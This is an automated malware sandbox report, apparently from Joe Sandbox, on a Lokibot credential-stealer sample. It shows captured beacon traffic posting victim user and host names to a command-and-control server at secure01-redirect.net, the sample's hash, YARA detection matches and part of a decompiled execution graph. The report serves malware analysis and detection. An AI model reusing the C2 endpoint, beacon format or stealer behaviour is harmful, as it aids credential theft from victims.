                Jan 28, 2022 23:38:49.508902073 CET12601OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 32 00 35 00 38 00 35 00 35 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                Data Ascii: (ckav.ruengineer258555DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                Jan 28, 2022 23:38:50.674108982 CET12602INHTTP/1.0 404 Not Found
                Date: Fri, 28 Jan 2022 22:40:31 GMT
                Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                X-Powered-By: PHP/5.4.16
                Status: 404 Not Found
                Content-Length: 23
                Content-Type: text/html; charset=UTF-8
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                31192.168.2.649882185.185.69.7680C:\Users\user\Desktop\kVijllv0Yl.exe
                TimestampkBytes transferredDirectionData
                Jan 28, 2022 23:38:52.315956116 CET12602OUTPOST /gc15/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: secure01-redirect.net
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: 7A2E941E
                Content-Length: 169
                Connection: close
                Jan 28, 2022 23:38:52.383330107 CET12603OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 32 00 35 00 38 00 35 00 35 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                Data Ascii: (ckav.ruengineer258555DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                Jan 28, 2022 23:38:53.689454079 CET12603INHTTP/1.0 404 Not Found
                Date: Fri, 28 Jan 2022 22:40:34 GMT
                Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                X-Powered-By: PHP/5.4.16
                Status: 404 Not Found
                Content-Length: 23
                Content-Type: text/html; charset=UTF-8
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                32192.168.2.649883185.185.69.7680C:\Users\user\Desktop\kVijllv0Yl.exe
                TimestampkBytes transferredDirectionData
                Jan 28, 2022 23:38:54.799525976 CET12604OUTPOST /gc15/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: secure01-redirect.net
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: 7A2E941E
                Content-Length: 169
                Connection: close
                Jan 28, 2022 23:38:54.866242886 CET12604OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 32 00 35 00 38 00 35 00 35 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                Data Ascii: (ckav.ruengineer258555DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                Jan 28, 2022 23:38:56.145380974 CET12604INHTTP/1.0 404 Not Found
                Date: Fri, 28 Jan 2022 22:40:36 GMT
                Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                X-Powered-By: PHP/5.4.16
                Status: 404 Not Found
                Content-Length: 23
                Content-Type: text/html; charset=UTF-8
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                33192.168.2.649885185.185.69.7680C:\Users\user\Desktop\kVijllv0Yl.exe
                TimestampkBytes transferredDirectionData
                Jan 28, 2022 23:38:57.255335093 CET12606OUTPOST /gc15/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: secure01-redirect.net
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: 7A2E941E
                Content-Length: 169
                Connection: close
                Jan 28, 2022 23:38:57.322833061 CET12612OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 32 00 35 00 38 00 35 00 35 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                Data Ascii: (ckav.ruengineer258555DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                Jan 28, 2022 23:38:58.636996984 CET12613INHTTP/1.0 404 Not Found
                Date: Fri, 28 Jan 2022 22:40:39 GMT
                Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                X-Powered-By: PHP/5.4.16
                Status: 404 Not Found
                Content-Length: 23
                Content-Type: text/html; charset=UTF-8
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                34192.168.2.649886185.185.69.7680C:\Users\user\Desktop\kVijllv0Yl.exe
                TimestampkBytes transferredDirectionData
                Jan 28, 2022 23:39:00.138022900 CET12613OUTPOST /gc15/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: secure01-redirect.net
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: 7A2E941E
                Content-Length: 169
                Connection: close
                Jan 28, 2022 23:39:00.207024097 CET12614OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 32 00 35 00 38 00 35 00 35 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                Data Ascii: (ckav.ruengineer258555DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                Jan 28, 2022 23:39:01.668778896 CET12614INHTTP/1.0 404 Not Found
                Date: Fri, 28 Jan 2022 22:40:41 GMT
                Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                X-Powered-By: PHP/5.4.16
                Status: 404 Not Found
                Content-Length: 23
                Content-Type: text/html; charset=UTF-8
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                4192.168.2.649774185.185.69.7680C:\Users\user\Desktop\kVijllv0Yl.exe
                TimestampkBytes transferredDirectionData
                Jan 28, 2022 23:37:20.261991978 CET1345OUTPOST /gc15/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: secure01-redirect.net
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: 7A2E941E
                Content-Length: 169
                Connection: close
                Jan 28, 2022 23:37:20.318430901 CET1345OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 32 00 35 00 38 00 35 00 35 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                Data Ascii: (ckav.ruengineer258555DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                Jan 28, 2022 23:37:21.668706894 CET1346INHTTP/1.0 404 Not Found
                Date: Fri, 28 Jan 2022 22:39:02 GMT
                Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                X-Powered-By: PHP/5.4.16
                Status: 404 Not Found
                Content-Length: 23
                Content-Type: text/html; charset=UTF-8
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                5192.168.2.649775185.185.69.7680C:\Users\user\Desktop\kVijllv0Yl.exe
                TimestampkBytes transferredDirectionData
                Jan 28, 2022 23:37:22.809911013 CET1346OUTPOST /gc15/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: secure01-redirect.net
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: 7A2E941E
                Content-Length: 169
                Connection: close
                Jan 28, 2022 23:37:22.905011892 CET1347OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 32 00 35 00 38 00 35 00 35 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                Data Ascii: (ckav.ruengineer258555DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                Jan 28, 2022 23:37:24.212196112 CET1347INHTTP/1.0 404 Not Found
                Date: Fri, 28 Jan 2022 22:39:04 GMT
                Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                X-Powered-By: PHP/5.4.16
                Status: 404 Not Found
                Content-Length: 23
                Content-Type: text/html; charset=UTF-8
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                6192.168.2.649776185.185.69.7680C:\Users\user\Desktop\kVijllv0Yl.exe
                TimestampkBytes transferredDirectionData
                Jan 28, 2022 23:37:25.398463011 CET1348OUTPOST /gc15/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: secure01-redirect.net
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: 7A2E941E
                Content-Length: 169
                Connection: close
                Jan 28, 2022 23:37:25.455180883 CET1348OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 32 00 35 00 38 00 35 00 35 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                Data Ascii: (ckav.ruengineer258555DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                Jan 28, 2022 23:37:26.758080006 CET1348INHTTP/1.0 404 Not Found
                Date: Fri, 28 Jan 2022 22:39:07 GMT
                Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                X-Powered-By: PHP/5.4.16
                Status: 404 Not Found
                Content-Length: 23
                Content-Type: text/html; charset=UTF-8
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                7192.168.2.649779185.185.69.7680C:\Users\user\Desktop\kVijllv0Yl.exe
                TimestampkBytes transferredDirectionData
                Jan 28, 2022 23:37:29.263305902 CET1372OUTPOST /gc15/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: secure01-redirect.net
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: 7A2E941E
                Content-Length: 169
                Connection: close
                Jan 28, 2022 23:37:29.329364061 CET1372OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 32 00 35 00 38 00 35 00 35 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                Data Ascii: (ckav.ruengineer258555DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                Jan 28, 2022 23:37:30.738581896 CET1373INHTTP/1.0 404 Not Found
                Date: Fri, 28 Jan 2022 22:39:11 GMT
                Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                X-Powered-By: PHP/5.4.16
                Status: 404 Not Found
                Content-Length: 23
                Content-Type: text/html; charset=UTF-8
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                8192.168.2.649780185.185.69.7680C:\Users\user\Desktop\kVijllv0Yl.exe
                TimestampkBytes transferredDirectionData
                Jan 28, 2022 23:37:33.962521076 CET1373OUTPOST /gc15/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: secure01-redirect.net
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: 7A2E941E
                Content-Length: 169
                Connection: close
                Jan 28, 2022 23:37:34.029126883 CET1374OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 32 00 35 00 38 00 35 00 35 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                Data Ascii: (ckav.ruengineer258555DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                Jan 28, 2022 23:37:35.373624086 CET1381INHTTP/1.0 404 Not Found
                Date: Fri, 28 Jan 2022 22:39:15 GMT
                Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                X-Powered-By: PHP/5.4.16
                Status: 404 Not Found
                Content-Length: 23
                Content-Type: text/html; charset=UTF-8
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                9192.168.2.649782185.185.69.7680C:\Users\user\Desktop\kVijllv0Yl.exe
                TimestampkBytes transferredDirectionData
                Jan 28, 2022 23:37:36.594727993 CET1382OUTPOST /gc15/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: secure01-redirect.net
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: 7A2E941E
                Content-Length: 169
                Connection: close
                Jan 28, 2022 23:37:36.663120031 CET1382OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 32 00 35 00 38 00 35 00 35 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                Data Ascii: (ckav.ruengineer258555DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                Jan 28, 2022 23:37:37.913034916 CET1382INHTTP/1.0 404 Not Found
                Date: Fri, 28 Jan 2022 22:39:18 GMT
                Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                X-Powered-By: PHP/5.4.16
                Status: 404 Not Found
                Content-Length: 23
                Content-Type: text/html; charset=UTF-8
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Statistics

                CPU Usage

                Click to jump to process

                Memory Usage

                Click to jump to process

                High Level Behavior Distribution

                Click to dive into process behavior distribution

                Behavior

                Click to jump to process

                System Behavior

                General

                Target ID:0
                Start time:23:36:56
                Start date:28/01/2022
                Path:C:\Users\user\Desktop\kVijllv0Yl.exe
                Wow64 process (32bit):true
                Commandline:"C:\Users\user\Desktop\kVijllv0Yl.exe"
                Imagebase:0x400000
                File size:247353 bytes
                MD5 hash:6997DE404FB7E798AECC2C8A14FD2F12
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000000.00000002.361757781.000000001ADE0000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth
                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.361757781.000000001ADE0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.361757781.000000001ADE0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.361757781.000000001ADE0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000000.00000002.361757781.000000001ADE0000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                • Rule: Loki_1, Description: Loki Payload, Source: 00000000.00000002.361757781.000000001ADE0000.00000004.00000800.00020000.00000000.sdmp, Author: kevoreilly
                • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.361757781.000000001ADE0000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                Reputation:low

                General

                Target ID:1
                Start time:23:36:58
                Start date:28/01/2022
                Path:C:\Users\user\Desktop\kVijllv0Yl.exe
                Wow64 process (32bit):true
                Commandline:"C:\Users\user\Desktop\kVijllv0Yl.exe"
                Imagebase:0x400000
                File size:247353 bytes
                MD5 hash:6997DE404FB7E798AECC2C8A14FD2F12
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000000.350551294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000001.00000000.350551294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000001.00000000.350551294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000001.00000000.350551294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                • Rule: Loki_1, Description: Loki Payload, Source: 00000001.00000000.350551294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly
                • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000001.00000000.350551294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000000.346477507.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000001.00000000.346477507.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000001.00000000.346477507.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000001.00000000.346477507.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                • Rule: Loki_1, Description: Loki Payload, Source: 00000001.00000000.346477507.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly
                • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000001.00000000.346477507.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000000.347539730.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000001.00000000.347539730.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000001.00000000.347539730.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000001.00000000.347539730.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                • Rule: Loki_1, Description: Loki Payload, Source: 00000001.00000000.347539730.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly
                • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000001.00000000.347539730.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000000.349125284.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000001.00000000.349125284.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000001.00000000.349125284.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000001.00000000.349125284.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                • Rule: Loki_1, Description: Loki Payload, Source: 00000001.00000000.349125284.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly
                • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000001.00000000.349125284.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.602834721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000001.00000002.602834721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000001.00000002.602834721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000001.00000002.602834721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                • Rule: Loki_1, Description: Loki Payload, Source: 00000001.00000002.602834721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly
                • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000001.00000002.602834721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                Reputation:low

                Disassembly

                Reset < >

                  Execution Graph

                  Execution Coverage:20.1%
                  Dynamic/Decrypted Code Coverage:6.8%
                  Signature Coverage:22.7%
                  Total number of Nodes:1344
                  Total number of Limit Nodes:33
                  execution_graph 4609 401cc1 GetDlgItem GetClientRect 4610 4029e8 18 API calls 4609->4610 4611 401cf1 LoadImageA SendMessageA 4610->4611 4612 401d0f DeleteObject 4611->4612 4613 40287d 4611->4613 4612->4613 4614 401dc1 4615 4029e8 18 API calls 4614->4615 4616 401dc7 4615->4616 4617 4029e8 18 API calls 4616->4617 4618 401dd0 4617->4618 4619 4029e8 18 API calls 4618->4619 4620 401dd9 4619->4620 4621 4029e8 18 API calls 4620->4621 4622 401de2 4621->4622 4623 401423 25 API calls 4622->4623 4624 401de9 ShellExecuteA 4623->4624 4625 401e16 4624->4625 4626 401ec5 4627 4029e8 18 API calls 4626->4627 4628 401ecc GetFileVersionInfoSizeA 4627->4628 4629 401eef GlobalAlloc 4628->4629 4636 401f45 4628->4636 4630 401f03 GetFileVersionInfoA 4629->4630 4629->4636 4631 401f14 VerQueryValueA 4630->4631 4630->4636 4632 401f2d 4631->4632 4631->4636 4637 4059e3 wsprintfA 4632->4637 4634 401f39 4638 4059e3 wsprintfA 4634->4638 4637->4634 4638->4636 4639 4014ca 4640 404e23 25 API calls 4639->4640 4641 4014d1 4640->4641 3998 403f4b lstrcpynA lstrlenA 3999 40604c 4005 405ed0 3999->4005 4000 40683b 4001 405f51 GlobalFree 4002 405f5a GlobalAlloc 4001->4002 4002->4000 4002->4005 4003 405fd1 GlobalAlloc 4003->4000 4003->4005 4004 405fc8 GlobalFree 4004->4003 4005->4000 4005->4001 4005->4002 4005->4003 4005->4004 3326 401f51 3327 401f63 3326->3327 3328 402004 3326->3328 3347 4029e8 3327->3347 3330 401423 25 API calls 3328->3330 3336 40215b 3330->3336 3332 4029e8 18 API calls 3333 401f73 3332->3333 3334 401f88 LoadLibraryExA 3333->3334 3335 401f7b GetModuleHandleA 3333->3335 3334->3328 3337 401f98 GetProcAddress 3334->3337 3335->3334 3335->3337 3338 401fe5 3337->3338 3339 401fa8 3337->3339 3364 404e23 3338->3364 3341 401fb0 3339->3341 3342 401fc7 3339->3342 3361 401423 3341->3361 3353 735e1000 VirtualAlloc 3342->3353 3344 401ff8 FreeLibrary 3344->3336 3345 401fb8 3345->3336 3345->3344 3348 4029f4 3347->3348 3375 405aa7 3348->3375 3350 401f6a 3350->3332 3354 735e4c8c 3353->3354 3355 735e1075 3353->3355 3354->3345 3355->3355 3356 735e107d GetTempPathW 3355->3356 3415 735e4c95 3356->3415 3359 735e10ed 3359->3359 3360 735e1106 EnumResourceTypesA 3359->3360 3360->3354 3362 404e23 25 API calls 3361->3362 3363 401431 3362->3363 3363->3345 3365 404ee1 3364->3365 3366 404e3e 3364->3366 3365->3345 3367 404e5b lstrlenA 3366->3367 3368 405aa7 18 API calls 3366->3368 3369 404e84 3367->3369 3370 404e69 lstrlenA 3367->3370 3368->3367 3372 404e97 3369->3372 3373 404e8a SetWindowTextA 3369->3373 3370->3365 3371 404e7b lstrcatA 3370->3371 3371->3369 3372->3365 3374 404e9d SendMessageA SendMessageA SendMessageA 3372->3374 3373->3372 3374->3365 3380 405ab4 3375->3380 3376 405cca 3377 402a15 3376->3377 3410 405a85 lstrcpynA 3376->3410 3377->3350 3394 405ce3 3377->3394 3379 405b48 GetVersion 3392 405b55 3379->3392 3380->3376 3380->3379 3381 405ca1 lstrlenA 3380->3381 3382 405aa7 10 API calls 3380->3382 3388 405ce3 5 API calls 3380->3388 3408 4059e3 wsprintfA 3380->3408 3409 405a85 lstrcpynA 3380->3409 3381->3380 3382->3381 3385 405bc0 GetSystemDirectoryA 3385->3392 3387 405bd3 GetWindowsDirectoryA 3387->3392 3388->3380 3389 405aa7 10 API calls 3389->3392 3390 405c4a lstrcatA 3390->3380 3391 405c07 SHGetSpecialFolderLocation 3391->3392 3393 405c1f SHGetPathFromIDListA CoTaskMemFree 3391->3393 3392->3380 3392->3385 3392->3387 3392->3389 3392->3390 3392->3391 3403 40596c RegOpenKeyExA 3392->3403 3393->3392 3401 405cef 3394->3401 3395 405d57 3396 405d5b CharPrevA 3395->3396 3398 405d76 3395->3398 3396->3395 3397 405d4c CharNextA 3397->3395 3397->3401 3398->3350 3400 405d3a CharNextA 3400->3401 3401->3395 3401->3397 3401->3400 3402 405d47 CharNextA 3401->3402 3411 4055a3 3401->3411 3402->3397 3404 4059dd 3403->3404 3405 40599f RegQueryValueExA 3403->3405 3404->3392 3406 4059c0 RegCloseKey 3405->3406 3406->3404 3408->3380 3409->3380 3410->3377 3412 4055a9 3411->3412 3413 4055bc 3412->3413 3414 4055af CharNextA 3412->3414 3413->3401 3414->3412 3416 735e109f CreateFileW GetFileSize VirtualAlloc ReadFile 3415->3416 3416->3359 3416->3360 4642 4014d6 4643 4029cb 18 API calls 4642->4643 4644 4014dc Sleep 4643->4644 4646 40287d 4644->4646 4013 401a58 4018 4029cb 4013->4018 4015 401a5f 4016 4029cb 18 API calls 4015->4016 4017 401a68 4016->4017 4019 405aa7 18 API calls 4018->4019 4020 4029df 4019->4020 4020->4015 4021 402858 SendMessageA 4022 402872 InvalidateRect 4021->4022 4023 40287d 4021->4023 4022->4023 4647 4018d8 4648 40190f 4647->4648 4649 4029e8 18 API calls 4648->4649 4650 401914 4649->4650 4651 4053aa 68 API calls 4650->4651 4652 40191d 4651->4652 4024 402259 4025 4029e8 18 API calls 4024->4025 4026 402267 4025->4026 4027 4029e8 18 API calls 4026->4027 4028 402270 4027->4028 4029 4029e8 18 API calls 4028->4029 4030 40227a GetPrivateProfileStringA 4029->4030 4031 40155b 4032 401577 ShowWindow 4031->4032 4033 40157e 4031->4033 4032->4033 4034 40158c ShowWindow 4033->4034 4035 40287d 4033->4035 4034->4035 4653 4018db 4654 4029e8 18 API calls 4653->4654 4655 4018e2 4654->4655 4656 405346 MessageBoxIndirectA 4655->4656 4657 4018eb 4656->4657 4036 404f61 4037 404f82 GetDlgItem GetDlgItem GetDlgItem 4036->4037 4038 40510d 4036->4038 4082 403e6c SendMessageA 4037->4082 4040 405116 GetDlgItem CreateThread CloseHandle 4038->4040 4041 40513e 4038->4041 4040->4041 4043 405169 4041->4043 4044 405155 ShowWindow ShowWindow 4041->4044 4045 40518b 